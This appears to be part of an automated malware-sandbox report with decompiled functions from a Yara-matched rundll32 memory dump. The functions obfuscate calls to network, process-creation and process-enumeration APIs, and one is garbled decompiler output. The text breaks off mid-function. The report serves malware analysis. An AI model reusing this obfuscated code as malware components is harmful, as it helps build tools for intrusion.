                          • Instruction Fuzzy Hash: 44210A36900148FBDF15DF95CC0ACDFBFBAEB89700F008049FA1466250D7B69A60DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Analysis Process: rundll32.exe PID: 4244 Parent PID: 6316 rundll32.exeCOMMON

                          Executed Functions

                          Function 035A505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E035A505F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;

				_v12 = 0xab28db;
				_v12 = _v12 * 0xb;
				_v12 = _v12 | 0x438b2011;
				_v12 = _v12 ^ 0x47dfe9f9;
				_v8 = 0x2279c5;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x1ef6af05;
				_v16 = 0x91523b;
				_v16 = _v16 ^ 0x417bd16a;
				_v16 = _v16 ^ 0x41eb784b;
				E035B0A93(0x9aad6eb1, 0x12d, _t29, _t29, 0x97da6f6d);
				ExitProcess(0);
			}







                          0x035a5065
                          0x035a507c
                          0x035a5084
                          0x035a508b
                          0x035a5092
                          0x035a509d
                          0x035a50a0
                          0x035a50a4
                          0x035a50ab
                          0x035a50b2
                          0x035a50b9
                          0x035a50c9
                          0x035a50d3

                          APIs
                          • ExitProcess.KERNEL32(00000000), ref: 035A50D3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Offset: 035A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: KxA
                          • API String ID: 621844428-223459762
                          • Opcode ID: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction ID: 7ddb15481cc157d838b5c0cb5d706ba30945b4295d0b1d2687122eff5480d776
                          • Opcode Fuzzy Hash: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction Fuzzy Hash: DA01F274D05208FBCB48DFE9D94698DFFB4EB40304F218199E911AB2A0D7702B989B05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 035A2C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E035A2C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E035A358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E035B0A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}









                          0x035a2c41
                          0x035a2c44
                          0x035a2c46
                          0x035a2c49
                          0x035a2c4c
                          0x035a2c4d
                          0x035a2c4e
                          0x035a2c53
                          0x035a2c5d
                          0x035a2c64
                          0x035a2c6b
                          0x035a2c72
                          0x035a2c79
                          0x035a2c80
                          0x035a2c87
                          0x035a2c8e
                          0x035a2caf
                          0x035a2cbb
                          0x035a2cc1

                          APIs
                          • lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 035A2CBB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Offset: 035A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: 17526b414e04b9d7d05064cf5350d1646689469a0a4be6055451d542458f0a5e
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: 19011679D01248BBDB05DFD5D94A9DEBFB4EF44210F00C088E81966220D7719B149B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 035AF66B, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E035AF66B(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a40, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, int _a56, WCHAR* _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t67;

				_push(_a60);
				_t67 = __ecx;
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E035A358A(_t46);
				_v12 = 0xe19ae5;
				_v12 = _v12 + 0xe09a;
				_t59 = 0x16;
				_v12 = _v12 * 0x55;
				_v12 = _v12 ^ 0x4b33a1b3;
				_v8 = 0x3d4fbd;
				_v8 = _v8 ^ 0xea855bbf;
				_t60 = 0x67;
				_v8 = _v8 / _t59;
				_v8 = _v8 ^ 0x0aa3a294;
				_v16 = 0x5e6fbc;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x00005386;
				E035B0A93(0xae3271c4, 0x240, _t60, _t60, 0x97da6f6d);
				_t57 = CreateProcessW(_t67, _a60, 0, 0, _a56, 0, 0, 0, _a40, _a44); // executed
				return _t57;
			}











                          0x035af673
                          0x035af678
                          0x035af67a
                          0x035af67d
                          0x035af67e
                          0x035af681
                          0x035af684
                          0x035af687
                          0x035af688
                          0x035af689
                          0x035af68c
                          0x035af68f
                          0x035af692
                          0x035af695
                          0x035af698
                          0x035af699
                          0x035af69c
                          0x035af69d
                          0x035af69e
                          0x035af6a3
                          0x035af6ad
                          0x035af6bc
                          0x035af6bf
                          0x035af6c2
                          0x035af6c9
                          0x035af6d0
                          0x035af6dc
                          0x035af6dd
                          0x035af6e2
                          0x035af6e9
                          0x035af6fa
                          0x035af6fd
                          0x035af719
                          0x035af733
                          0x035af73a

                          APIs
                          • CreateProcessW.KERNELBASE(2D09D167,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 035AF733
                          Memory Dump Source
                          • Source File: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Offset: 035A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction ID: 5bd9c65ca736d0078e02ab22d3104ff4addaf5d2696dc25208416c3632439584
                          • Opcode Fuzzy Hash: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction Fuzzy Hash: 4521E636900248BBDF15DF95DC0ACDFBFBAEB89704F008049FA1466260D6B69A609B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Analysis Process: rundll32.exe PID: 360 Parent PID: 4244 rundll32.exeCOMMON

                          Executed Functions

                          Function 009A3394, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenetworkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 65%
                          			E009A3394(void* __ecx, void* __edx, void* _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				int _t40;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E009A358A(_t34);
				_v12 = 0x7f6b59;
				_v12 = _v12 + 0xffff1eae;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x8a017b05;
				_v8 = 0x86a8a3;
				_v8 = _v8 + 0x743d;
				_v8 = _v8 | 0xc6fb265b;
				_v8 = _v8 + 0xffff26dd;
				_v8 = _v8 ^ 0xc6fa1265;
				_v16 = 0x1eb5a8;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xb5ad45e3;
				E009B0A93(0xe7c0fd33, 8, __ecx, __ecx, 0x746d919);
				_t40 = InternetReadFile(_a4, _a8, _a16, _a20); // executed
				return _t40;
			}








                          0x009a339a
                          0x009a339d
                          0x009a33a0
                          0x009a33a3
                          0x009a33a6
                          0x009a33aa
                          0x009a33ab
                          0x009a33b0
                          0x009a33ba
                          0x009a33c1
                          0x009a33c5
                          0x009a33cc
                          0x009a33d3
                          0x009a33da
                          0x009a33e1
                          0x009a33e8
                          0x009a33ef
                          0x009a33f6
                          0x009a33fa
                          0x009a3418
                          0x009a342c
                          0x009a3431

                          APIs
                          • InternetReadFile.WININET(8A017B05,B5AD45E3,?,?), ref: 009A342C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FileInternetRead
                          • String ID: =t
                          • API String ID: 778332206-2086268772
                          • Opcode ID: 1ea264287f15000a41c4becbe50c600cf697e8e4a27d44ce9c23195ef66fae5e
                          • Instruction ID: 5b72b512d3ffcecdb2d0903b8421d6f0cf9d350036fd9a8da07c256e8d009954
                          • Opcode Fuzzy Hash: 1ea264287f15000a41c4becbe50c600cf697e8e4a27d44ce9c23195ef66fae5e
                          • Instruction Fuzzy Hash: 4B1115B6D0020DBFDF01AFD4C9469DEBF71EB04300F108088F91466121D7B29B62AF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009BE2C8, Relevance: 1.5, APIs: 1, Instructions: 42fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E009BE2C8(struct _WIN32_FIND_DATAW* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				void* _t37;
				struct _WIN32_FIND_DATAW* _t41;

				_push(_a8);
				_t41 = __ecx;
				_push(_a4);
				_push(__ecx);
				E009A358A(_t30);
				_v16 = 0x5048a4;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0x491d25b5;
				_v16 = _v16 ^ 0x49b392fc;
				_v8 = 0x81d843;
				_v8 = _v8 + 0xffff1f82;
				_v8 = _v8 >> 5;
				_v8 = _v8 * 0x6d;
				_v8 = _v8 ^ 0x01b47671;
				_v12 = 0x1deeda;
				_v12 = _v12 << 0xb;
				_v12 = _v12 + 0xa025;
				_v12 = _v12 ^ 0xef7153f9;
				E009B0A93(0x90b108a4, 0x357, __ecx, __ecx, 0x97da6f6d);
				_t37 = FindFirstFileW(_a8, _t41); // executed
				return _t37;
			}









                          0x009be2cf
                          0x009be2d2
                          0x009be2d4
                          0x009be2d8
                          0x009be2d9
                          0x009be2de
                          0x009be2e8
                          0x009be2eb
                          0x009be2f2
                          0x009be2f9
                          0x009be300
                          0x009be307
                          0x009be31b
                          0x009be323
                          0x009be32a
                          0x009be331
                          0x009be335
                          0x009be33c
                          0x009be34c
                          0x009be358
                          0x009be35e

                          APIs
                          • FindFirstFileW.KERNEL32(49B392FC,?,?,?,?,?,?,?,?,0000007C), ref: 009BE358
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 01bbbee7d134792f612db04b22406960f720b7ee30a51e2b4ad9f345277f7be7
                          • Instruction ID: 45cbdcaf88f9797cd9fff988913c03b52fdded81496e489c446ac79231b47efd
                          • Opcode Fuzzy Hash: 01bbbee7d134792f612db04b22406960f720b7ee30a51e2b4ad9f345277f7be7
                          • Instruction Fuzzy Hash: 6B013576C01208FBDF08DFA8D90A9DEBBB4EF80314F10C199E914A6250D7B55B14DF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009C1B99, Relevance: 1.5, APIs: 1, Instructions: 33processCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E009C1B99(void* __ecx, int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;

				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1142a3;
				_v16 = 0x988470;
				_v16 = _v16 * 5;
				_v16 = _v16 ^ 0x02f8e52f;
				_v12 = 0x92f973;
				_v12 = _v12 + 0xffff1bf9;
				_v12 = _v12 ^ 0x00999b7e;
				_v8 = 0x76942;
				_v8 = _v8 | 0x28d55476;
				_v8 = _v8 ^ 0x5c07813d;
				_v8 = _v8 ^ 0x74d56b5b;
				E009B0A93(0xac5019f8, 0x147, __ecx, __ecx, 0x97da6f6d);
				_t32 = CreateToolhelp32Snapshot(_a8, 0); // executed
				return _t32;
			}










                          0x009c1b9f
                          0x009c1ba3
                          0x009c1ba7
                          0x009c1bae
                          0x009c1bc5
                          0x009c1bcd
                          0x009c1bd4
                          0x009c1bdb
                          0x009c1be2
                          0x009c1be9
                          0x009c1bf0
                          0x009c1bf7
                          0x009c1bfe
                          0x009c1c0e
                          0x009c1c1b
                          0x009c1c20

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(02F8E52F,00000000), ref: 009C1C1B
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3332741929-0
                          • Opcode ID: b9b0bae15c15fe7ee040604755b9c6b5a28aa46ead81e70933f27a0a1836d12b
                          • Instruction ID: d073751636811ba16768dd4b0c48b3e396cd598f4b0601c6956c480a94f60cff
                          • Opcode Fuzzy Hash: b9b0bae15c15fe7ee040604755b9c6b5a28aa46ead81e70933f27a0a1836d12b
                          • Instruction Fuzzy Hash: CD011A75D05309FBCB04DFA8D94A69EBBF4EB00314F208188A425B6261E7B45B148F40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009B2F8B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                          Download Yara Rule
                          C-Code - Quality: 41%
                          			E009B2F8B(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, DWORD* _a16, intOrPtr _a24, WCHAR* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				int _t45;

				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(0);
				E009A358A(_t37);
				_v16 = 0x9e83cd;
				_v16 = _v16 * 0x21;
				_v16 = _v16 | 0x2e16a98e;
				_v16 = _v16 ^ 0x3e7c59df;
				_v12 = 0xc8c861;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x3f756348;
				_v12 = _v12 ^ 0x3f60ef0b;
				_v8 = 0xa341cc;
				_v8 = _v8 + 0xe972;
				_v8 = _v8 + 0xffff2ccb;
				_v8 = _v8 ^ 0x00a1bec4;
				E009B0A93(0xedba24fb, 0x68, __ecx, __ecx, 0x97da6f6d);
				_t45 = GetVolumeInformationW(_a32, 0, 0, _a16, 0, 0, 0, 0); // executed
				return _t45;
			}








                          0x009b2f92
                          0x009b2f97
                          0x009b2f98
                          0x009b2f9b
                          0x009b2f9e
                          0x009b2fa1
                          0x009b2fa2
                          0x009b2fa5
                          0x009b2fa6
                          0x009b2fa9
                          0x009b2fac
                          0x009b2faf
                          0x009b2fb0
                          0x009b2fb1
                          0x009b2fb2
                          0x009b2fb7
                          0x009b2fcb
                          0x009b2fce
                          0x009b2fd5
                          0x009b2fdc
                          0x009b2fe3
                          0x009b2fe7
                          0x009b2fee
                          0x009b2ff5
                          0x009b2ffc
                          0x009b3003
                          0x009b3010
                          0x009b3028
                          0x009b303c
                          0x009b3042

                          APIs
                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 009B303C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: InformationVolume
                          • String ID: Hcu?$r
                          • API String ID: 2039140958-387928853
                          • Opcode ID: 72a0f5fcc0593c0b222dd612c865db2867851f8828395aa415f0546057203f65
                          • Instruction ID: 2837e5ee22ae50ae7f5188943b2a2640db1cb1664fd7708772db6cd3d76727bb
                          • Opcode Fuzzy Hash: 72a0f5fcc0593c0b222dd612c865db2867851f8828395aa415f0546057203f65
                          • Instruction Fuzzy Hash: B011A772802219FBCF15DFE68D498CFBFB9EF09364F108188F91966150D2719A64DFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009ACA5D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E009ACA5D(void* __ecx, struct tagPROCESSENTRY32W* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t55;
				signed int _t57;
				signed int _t58;
				struct tagPROCESSENTRY32W* _t65;

				_push(_a16);
				_t65 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E009A358A(_t45);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x5ae04a;
				_v12 = 0x2e7a24;
				_t57 = 0x1b;
				_v12 = _v12 / _t57;
				_t58 = 0x6a;
				_v12 = _v12 / _t58;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x0002de96;
				_v8 = 0x26fcda;
				_v8 = _v8 >> 6;
				_v8 = _v8 << 9;
				_v8 = _v8 * 0x27;
				_v8 = _v8 ^ 0x2f8a1116;
				_v16 = 0x1f8a0;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x000f890e;
				_t55 = E009B0A93(0xbd4bc35, 0x308, _t58, _t58, 0x97da6f6d);
				Process32FirstW(_a4, _t65); // executed
				return _t55;
			}














                          0x009aca64
                          0x009aca67
                          0x009aca69
                          0x009aca6c
                          0x009aca6f
                          0x009aca72
                          0x009aca73
                          0x009aca74
                          0x009aca79
                          0x009aca80
                          0x009aca86
                          0x009aca8d
                          0x009aca99
                          0x009aca9e
                          0x009acaa6
                          0x009acaae
                          0x009acab1
                          0x009acab5
                          0x009acabc
                          0x009acac3
                          0x009acac7
                          0x009acadb
                          0x009acade
                          0x009acae5
                          0x009acaec
                          0x009acaf0
                          0x009acb00
                          0x009acb0c
                          0x009acb12

                          APIs
                          • Process32FirstW.KERNEL32(0002DE96,?,?,?,?,?,?,?,?,?,?,0003E478), ref: 009ACB0C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FirstProcess32
                          • String ID: $z.$JZ
                          • API String ID: 2623510744-2410909452
                          • Opcode ID: eaf0db2205d2e4c8a3f90eb225d2bd9d833bd5d68fb90ca9f7293e4f6906fdfe
                          • Instruction ID: 07e0174addc48f68d22c111deed15f1a4c35a4a578b7ef7edeb20b2e22feeb79
                          • Opcode Fuzzy Hash: eaf0db2205d2e4c8a3f90eb225d2bd9d833bd5d68fb90ca9f7293e4f6906fdfe
                          • Instruction Fuzzy Hash: 7C113376D0120CFBDF08DFA4C94A9EEBBB1EB94314F108099E914AB240E7B15B64DF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009A187B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
                          Download Yara Rule
                          C-Code - Quality: 45%
                          			E009A187B(void* __eax, signed int __ebx, char* __edx, signed int __edi, void* __esi, signed long long __fp0, void* _a1, intOrPtr _a4, void* _a8) {
				char _v1;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				char* _t33;
				int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t48;
				char* _t54;
				void* _t57;
				char* _t60;
				signed int _t66;
				signed long long _t68;

				_t68 = __fp0;
				_t48 = __edi;
				_t41 = __ebx;
				asm("adc al, 0xc8");
				_t33 = __edx;
				_t42 = 0x6d;
				asm("fiadd dword [ebp-0x62398f13]");
				 *(__edx - 0x43f1b623) =  *(__edx - 0x43f1b623) & __edi;
				 *((char*)(__edi + 3)) =  *((char*)(__edi + 3)) - 0x60;
				while(1) {
					asm("rcl bh, cl");
					asm("aas");
					asm("adc dl, ch");
					asm("in eax, 0xa1");
					asm("daa");
					asm("scasd");
					asm("o16 js 0x23");
					asm("loopne 0xffffffff");
					_push(ds);
					_t47 = 0x82;
					_t68 = _t68 /  *(_t41 + 0x7f);
					 *[ds:ecx] = ss;
					if(_t57 < _t33) {
						goto L9;
					}
					 *_t42 = ss;
					 *((intOrPtr*)(_t48 - 0x1e)) =  *((intOrPtr*)(_t48 - 0x1e)) - 0x82;
					_t47 = 0x83;
					_t41 = _t41 |  *(_t48 - 0x44);
					_t54 =  &_v1;
					if(_t41 >=  *((intOrPtr*)(_t41 - 0x16))) {
						_push(0x83);
						asm("clc");
						asm("invalid");
						asm("enter 0xfdbb, 0xd2");
						_pop(_t33);
					}
					asm("xlatb");
					_t42 = 0xae;
					_t33 = _t33 + 1;
					asm("movsd");
					asm("pushad");
					if(_t33 <= 0) {
						_t60 = _t54;
						_pop(_t55);
						asm("enter 0x8b55, 0xec");
						_push(_a4);
						_push(_t47);
						_push(0xae);
						_t33 = E009A358A(_t33);
						_v8 = 0x7ed2b1;
						_t57 = _t60 - 0xc + 0xc;
						goto L9;
					}
					L10:
					while(_t66 <= 0) {
						if(_t66 != 0) {
							continue;
						}
						asm("insd");
						goto 0x96a4;
						 *_t33 =  *_t33 + 0xc1;
						asm("insd");
						asm("clc");
						asm("insd");
						asm("clc");
						_push(cs);
						_v8 = _v8 ^ 0x00043c3a;
						_v12 = 0x85594a;
						_v12 = _v12 * 0x60;
						_v12 = _v12 ^ 0x32067144;
						E009B0A93(0xcff283f, 0x2c2, _t42, _t42, 0x746d919);
						_t40 = InternetCloseHandle(_a8); // executed
						return _t40;
					}
					asm("invalid");
					asm("invalid");
					_push(_t33);
					asm("fcomp st0, st2");
					continue;
					L9:
					asm("les ecx, [ecx+eax*4]");
					asm("cld");
					asm("fucomi st0, st5");
					_t42 = _t42 &  *_t47;
					_v4 = _v4 + 0xfffffd30;
					_t19 =  &_v4;
					 *_t19 = _v4 ^ 0x7f9c4fa4;
					_t66 =  *_t19;
					goto L10;
				}
			}

















                          0x009a187b
                          0x009a187b
                          0x009a187b
                          0x009a187b
                          0x009a187d
                          0x009a187e
                          0x009a1880
                          0x009a1886
                          0x009a188c
                          0x009a18f1
                          0x009a18f1
                          0x009a18f3
                          0x009a18f4
                          0x009a18f6
                          0x009a18f8
                          0x009a18f9
                          0x009a18fb
                          0x009a18fe
                          0x009a1900
                          0x009a1903
                          0x009a1905
                          0x009a1909
                          0x009a190c
                          0x00000000
                          0x00000000
                          0x009a190e
                          0x009a1910
                          0x009a1913
                          0x009a1914
                          0x009a1917
                          0x009a191b
                          0x009a191d
                          0x009a191e
                          0x009a191f
                          0x009a1922
                          0x009a1926
                          0x009a1926
                          0x009a192a
                          0x009a192b
                          0x009a192d
                          0x009a192e
                          0x009a192f
                          0x009a1930
                          0x009a1932
                          0x009a1932
                          0x009a1933
                          0x009a193a
                          0x009a193d
                          0x009a193e
                          0x009a193f
                          0x009a1944
                          0x009a194b
                          0x00000000
                          0x009a194b
                          0x00000000
                          0x009a1962
                          0x009a1964
                          0x00000000
                          0x00000000
                          0x009a1967
                          0x009a1968
                          0x009a196f
                          0x009a1972
                          0x009a1973
                          0x009a1976
                          0x009a1977
                          0x009a1978
                          0x009a1979
                          0x009a1980
                          0x009a1997
                          0x009a199f
                          0x009a19af
                          0x009a19ba
                          0x009a19bf
                          0x009a19bf
                          0x009a18e5
                          0x009a18e7
                          0x009a18e9
                          0x009a18ea
                          0x00000000
                          0x009a194c
                          0x009a194c
                          0x009a1950
                          0x009a1951
                          0x009a1953
                          0x009a1955
                          0x009a195c
                          0x009a195c
                          0x009a195c
                          0x00000000
                          0x009a195c

                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Emu
                          • API String ID: 0-3203347589
                          • Opcode ID: 25de749f85056323d1baa598e857823123953aeed08ff78defee1ac49a3c195e
                          • Instruction ID: 604ccc598152b55da4fff4c7f10ffd48f38eacce81d19b597e629332db20217c
                          • Opcode Fuzzy Hash: 25de749f85056323d1baa598e857823123953aeed08ff78defee1ac49a3c195e
                          • Instruction Fuzzy Hash: 4931F2B5D1120CEFCB01DF68C98A6EEBBB4FF56314F248188E4546A121E3369B15CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009B2621, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 44%
                          			E009B2621(void* __ecx, void* __edx, signed int _a4, WCHAR* _a8, intOrPtr _a12, long _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a44) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				unsigned int _v24;
				void* _t45;
				void* _t46;
				signed int _t48;
				short _t54;

				_push(_a44);
				_t54 = _a4;
				_push(0);
				_push(0);
				_push(0);
				_push(_a28);
				_t46 = __ecx;
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_t54 & 0x0000ffff);
				_push(__ecx);
				E009A358A(_t54 & 0x0000ffff);
				_v16 = 0x4ab134;
				asm("stosd");
				asm("stosd");
				_t48 = 0x48;
				asm("stosd");
				_v20 = 0x2f776b;
				_t11 =  &_v20; // 0x2f776b
				_v20 =  *_t11 / _t48;
				_v20 = _v20 ^ 0x000758a3;
				_v24 = 0x8997c2;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x000f0067;
				_a4 = 0x3b54a3;
				_a4 = _a4 + 0xffff0f44;
				_a4 = _a4 << 2;
				_a4 = _a4 ^ 0x00e2d315;
				E009B0A93(0x2d49660e, 0x267, _t48, _t48, 0x746d919);
				_t45 = InternetConnectW(_t46, _a8, _t54, 0, 0, _a20, 0, 0); // executed
				return _t45;
			}











                          0x009b2628
                          0x009b262c
                          0x009b2632
                          0x009b2633
                          0x009b2634
                          0x009b2635
                          0x009b263c
                          0x009b263e
                          0x009b2642
                          0x009b2646
                          0x009b2647
                          0x009b264b
                          0x009b264f
                          0x009b2651
                          0x009b2652
                          0x009b2657
                          0x009b2668
                          0x009b266d
                          0x009b266e
                          0x009b2675
                          0x009b2676
                          0x009b267e
                          0x009b2685
                          0x009b268e
                          0x009b2696
                          0x009b269e
                          0x009b26a3
                          0x009b26ab
                          0x009b26b3
                          0x009b26bb
                          0x009b26c0
                          0x009b26d9
                          0x009b26ef
                          0x009b26f8

                          APIs
                          • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000,?,?,00000048,0746D919), ref: 009B26EF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ConnectInternet
                          • String ID: kw/
                          • API String ID: 3050416762-1886138299
                          • Opcode ID: 60efb2d932fe1d2a61d30d4dd1f4fa047e7d040deb567973821c97f849e7d817
                          • Instruction ID: 41133246ecd083181fbecc1c6fe1987ad7cdcc2df01a1c0402160a1cb74c9d8f
                          • Opcode Fuzzy Hash: 60efb2d932fe1d2a61d30d4dd1f4fa047e7d040deb567973821c97f849e7d817
                          • Instruction Fuzzy Hash: C9214C71508344BFD3409F96CC49C6BFFE9EBCA798F40480DF68542221D7BAD9188B62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009B9FF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 42%
                          			E009B9FF7(WCHAR* __ecx, long __edx, void* _a4, intOrPtr _a8, intOrPtr _a16, WCHAR* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a40) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t36;
				void* _t43;
				WCHAR* _t44;
				long _t49;

				_t49 = __edx;
				_push(0);
				_push(_a40);
				_t44 = __ecx;
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E009A358A(_t36);
				_v16 = 0xabecd4;
				asm("stosd");
				asm("stosd");
